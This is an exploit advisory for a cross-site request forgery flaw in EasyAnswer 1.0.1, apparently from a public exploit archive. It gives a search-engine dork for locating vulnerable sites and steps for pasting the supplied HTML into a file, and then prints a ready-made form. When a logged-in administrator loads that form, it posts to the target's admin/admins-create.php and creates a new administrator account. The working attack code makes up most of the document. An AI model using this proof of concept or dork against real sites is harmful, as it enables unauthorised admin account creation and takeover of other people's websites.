====================================================================================================================================
| # Title     : EasyAnswer version 1.0.1 CSRF Vulnerability                                                                        |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 114.0.1(64-bit)                                            | 
| # Vendor    : https://www.codester.com/items/40311/                                                                              |  
| # Dork      : "© 2022 Easy Answer All rights reserved."                                                                          |
====================================================================================================================================

poc :

[+] infected file: admins-create.php

[+] Inside folder /admin/admins-create.php

[+] Dorking Ä°n Google Or Other Search Enggine.

[+] Copy the code below and paste it into an HTML file.

[+] Go to the line 17.

[+] Set the target site link Save changes and apply . 

 </i>Create Administrator</h2>
                  </div>
                </div>
              </div>
            </div>
          </div>
          
          <div class="row">
            <div class="col-md-12 stretch-card">
              <div class="card">
               
               <div class="card-body">
                
                <div id="messages">
                                 </div>
                
 <form action="http://CHANGE_TARGET.com/admin/admins-create.php" method="post" id="main_form" name="main_form" enctype="multipart/form-data">
                 <input type="hidden" id="submitform" name="submitform" value="1">
                 
                 <div class="form-group row">
                      <label for="username" class="col-sm-2 col-form-label">Username:</label>
                      <div class="col-sm-12">
                        <input type="text" class="form-control" id="username" name="username" value="" placeholder="ADMIN USERNAME">
                      </div>
                 </div>
                 <div class="form-group row">
                      <label for="password" class="col-sm-2 col-form-label">Password:</label>
                      <div class="col-sm-12">
                        <input type="password" class="form-control" id="password" name="password" value="" placeholder="ADMIN PASSWORD">
                      </div>
                 </div>
                 
                 <div class="form-group row">
                      <label for="email" class="col-sm-2 col-form-label">E-Mail:</label>
                      <div class="col-sm-12">
                        <input type="email" class="form-control" id="email" name="email" value="" placeholder="ADMIN E-MAIL ADDRESS">
                      </div>
                 </div>
                 
                 <div class="row-spaces"></div>
                 
                 <p>
                  <button type="button" class="btn btn-primary btn-col-light me-2" onclick="document.main_form.submit();" style=""><span>Submit</span></button>
                 </p>
                </form>
                
                
              </div>
             </div>
            </div>
           </div>
                   
        </div>
		
Greetings to :===================================================================================
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet|        
==================================================================================================